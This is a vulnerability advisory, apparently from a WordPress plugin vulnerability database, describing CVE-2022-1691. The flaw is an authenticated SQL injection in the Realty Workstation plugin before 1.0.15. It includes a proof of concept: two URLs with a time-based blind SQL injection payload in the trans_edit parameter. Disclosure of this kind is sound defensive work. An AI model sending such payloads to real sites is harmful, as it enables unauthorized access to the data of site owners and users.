Realty Workstation < 1.0.15 – Agent SQLi | CVE 2022-1691 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the trans_edit parameter before using it in a SQL statement when an agent edit a transaction, leading to an SQL injection

Proof of Concept

As a logged in agent:
https://example.com/workstation/?transactions=open_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
https://example.com/workstation/?transactions= open_agent_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)

Affects Plugins

realty-workstation

Fixed in 1.0.15

References

CVE

URL

https://bulletin.iese.de/post/realty-workstation_1-0-6

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)

Submitter

Daniel Krohmer

Submitter website

https://iese.fraunhofer.de/en.html

Verified

Yes

WPVDB ID

f9363b4c-c434-4f15-93f8-46162d2d7049

Timeline

Publicly Published

2022-05-09 (about 3 years ago)

Added

2022-05-12 (about 3 years ago)

Last Updated

2022-06-21 (about 3 years ago)

Other

Published

Title

Published

2024-04-12

Title

User Activity Log Pro <= 2.3.4 - Authenticated (Subscriber+) SQL Injection

Published

2024-12-05

Title

YouTube Gallery and Vimeo Gallery Plugin < 2.4.3 - Authenticated (Administrator+) SQL Injection

Published

2023-04-18

Title

Email posts to subscribers <= 6.2 - Unauthenticated SQLi

Published

2014-08-01

Title

WP-SpamFree 3.2.1 - Spam SQL Injection

Published

2025-03-24

Title

WP Featured Entries <= 1.0 - Authenticated (Contributor+) SQL Injection